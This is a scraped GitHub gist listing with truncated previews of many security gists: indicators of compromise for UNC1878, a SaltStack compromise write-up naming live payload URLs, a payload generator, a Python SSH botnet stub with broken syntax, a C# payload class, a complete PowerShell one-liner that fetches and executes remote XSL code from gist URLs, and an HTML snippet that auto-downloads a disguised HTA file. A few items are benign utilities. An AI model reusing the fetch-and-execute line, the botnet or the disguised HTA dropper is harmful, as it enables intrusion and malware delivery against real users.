Skip to content

Instantly share code, notes, and snippets.

View reanimat0r's full-sized avatar

Bart Black reanimat0r

26 followers · 51 following
View GitHub Profile
@aaronst
aaronst / unc1878_indicators.txt
Created October 28, 2020 20:20
UNC1878 Indicators
# C2 FQDNs
first seen fqdn
2019-12-11 23:37:10 updatemanagir.us
2019-12-20 17:51:05 cmdupdatewin.com
2019-12-26 18:03:27 scrservallinst.info
2020-01-10 00:33:57 winsystemupdate.com
2020-01-11 23:16:41 jomamba.best
2020-01-13 05:13:43 updatewinlsass.com
2020-01-16 11:38:53 winsysteminfo.com
2020-01-20 05:58:17 livecheckpointsrs.com
@m8sec
m8sec / oscp_payload_generator.sh
Last active July 27, 2024 10:44
#!/usr/bin/env bash
# Script to quickly and easily create non-meterpreter payloads for the OSCP
# @m8sec
# Note: It is recommeneded to create a new directory before running this
# script. All payloads will be placed in the current directory
IP="127.0.0.1" # <YOUR IP HERE>
PORT=443 # You may have to change this if there are outbound restrictions on the target ;)
@reanimat0r
reanimat0r / botnet.py
Created June 19, 2020 21:09 — forked from lava9868/botnet.py
botnet in python
# basic ssh botnet
import pxssh #calling pxssh module
class Client: #defining class with name client
def_init_(self,host,user,password):
self.host = host
self.user=user
self.password = password
self.session = self.connect() # for ssh session
@cachedout
cachedout / gist:2950de63aa102ec9ccb895deea1aa539
Created May 4, 2020 09:37
Mirror of Slack CVE discussion
## Overview
What we know so far:
Source: https://github.com/saltstack/salt/issues/57057
Payload distribution point: https://bitbucket.org/samk12dd/git/src/master/ --update: now defunct
Updated payload distrib URL: http://413628.selcdn.ru/cdn/salt-storer
Bootloader distribution link: http://89.223.121.139/sa.sh
backup CNC command source: http://54.36.185.99/c.sh
This is a crypto-mining operation. salt-minions is a compiled xmrig binary (https://github.com/xmrig/xmrig).
salt-store contains a RAT, nspps (https://ironnet.com/blog/malware-analysis-nspps-a-go-rat-backdoor/).
@mgeeky
mgeeky / PowerShell.txt
Created April 30, 2020 21:40
Snippets of PowerShell bypass/evasion/execution techniques that are interesting
##############################################################################
### Powershell Xml/Xsl Assembly "Fetch & Execute"
### [https://twitter.com/bohops/status/966172175555284992]
$s=New-Object System.Xml.Xsl.XsltSettings;$r=New-Object System.Xml.XmlUrlResolver;$s.EnableScript=1;$x=New-Object System.Xml.Xsl.XslCompiledTransform;$x.Load('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xsl',$s,$r);$x.Transform('https://gist.githubusercontent.com/bohops/ee9e2d7bdd606c264a0c6599b0146599/raw/f8245f99992eff00eb5f0d5738dfbf0937daf5e4/xsl-notepad.xml','z');del z;
##############################################################################
### Powershell VBScript Assembly SCT "Fetch & Execute"
### [https://twitter.com/bohops/status/965670898379476993]
@gvenk
gvenk / convert-all-youtube-urls-to-nocookie-bookmarklet.js
Last active January 7, 2025 10:58
Convert all youtube urls on a webpage to youtube-nocookie.com urls
javascript:void%20function(){const%20a=document.querySelectorAll(%22a%22);a.forEach(a=%3E{if(-1!==a.href.indexOf(%22youtube.com%22)){const%20b=new%20URL(a.href).searchParams,c=b.get(%22v%22);c%26%26(a.href=%22https://www.youtube-nocookie.com/embed/%22+c)}else-1!==a.href.indexOf(%22youtu.be%22)%26%26(a.href=a.href.replace(%22//youtu.be/%22,%22//www.youtube-nocookie.com/embed/%22))});const%20b=document.querySelectorAll(%22iframe%22);b.forEach(a=%3E{-1===a.src.indexOf(%22//www.youtube.com%22)%3F-1!==a.src.indexOf(%22//youtube.com%22)%26%26(a.src=a.src.replace(%22//youtube.com/%22,%22//www.youtube-nocookie.com/%22)):a.src=a.src.replace(%22//www.youtube.com/%22,%22//www.youtube-nocookie.com/%22)})}();
@gwen001
gwen001 / ejs.sh
Last active July 7, 2024 07:33
onliner to extract endpoints from JS files of a given host
curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu
# using linkfinder
function ejs() {
URL=$1;
curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}
# with file download (the new best one):
# but there is a bug if you don't provide a root url
@rvrsh3ll
rvrsh3ll / blockdlls_gadget2jscript.cs
Last active January 24, 2022 14:45
using System;
using System.IO;
using System.Net;
using System.Diagnostics;
using System.IO.Compression;
using System.Runtime.InteropServices;
public class Payload
{
public Payload()
@bmatthewshea
bmatthewshea / geoip2lookup.bash
Last active April 14, 2025 01:46
GeoIP Lookup scripts for use with new Maxmind MMDB database files
#!/bin/bash
#
# By: Brady Shea - 10FEB2020 - Last update 04DEC2023
#
# Usage (ip4 only):
# geoip2lookup IP_ADDRESS
#
# ** Install GeoIP Tool and Updater **
#
# sudo add-apt-repository ppa:maxmind/ppa
@rvrsh3ll
rvrsh3ll / downloader.html
Created January 30, 2020 18:46
<a href="#" id="download">legit</al>
<script>
var element = document.getElementById("download");
element.href = "legit.hta";
element.click();
</script>